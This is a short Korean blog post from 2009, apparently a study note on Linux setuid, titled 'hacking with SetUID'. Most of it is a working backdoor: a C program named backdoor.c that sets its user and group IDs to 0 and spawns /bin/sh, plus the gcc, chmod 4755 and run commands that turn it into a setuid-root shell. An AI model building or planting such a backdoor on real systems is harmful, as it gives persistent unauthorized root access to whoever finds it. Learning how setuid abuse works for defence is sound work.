예전것/Linux Basic
SetUID를 이용한 해킹
hangover
2009. 9. 7. 22:16
SetUID는 보안에 치명적일수 있다고 전에 배웠다.
참고 : http://cheesev.tistory.com/entry/aboutSetUID
원래 SetUID개념이라면 root권한으로 실행이 되어서 rm -rf 명령으로 지워져야하지만 이에 대한 보안노력이 있어 잘 먹히지 않는다. 약간의 트릭으로 이를 피해보자
backdoor.c라는 소스를 코딩하여 컴파일
#include<stdio.h>
main(){
setuid(0);
setgid(0);
system("/bin/sh");
}
#gcc -o backdoor backdoor.c
#chmod 4755 backdoor
을 수행한후
#./backdoor
를 쳐보면
쉘 권한이 바뀐것을 볼 수있다.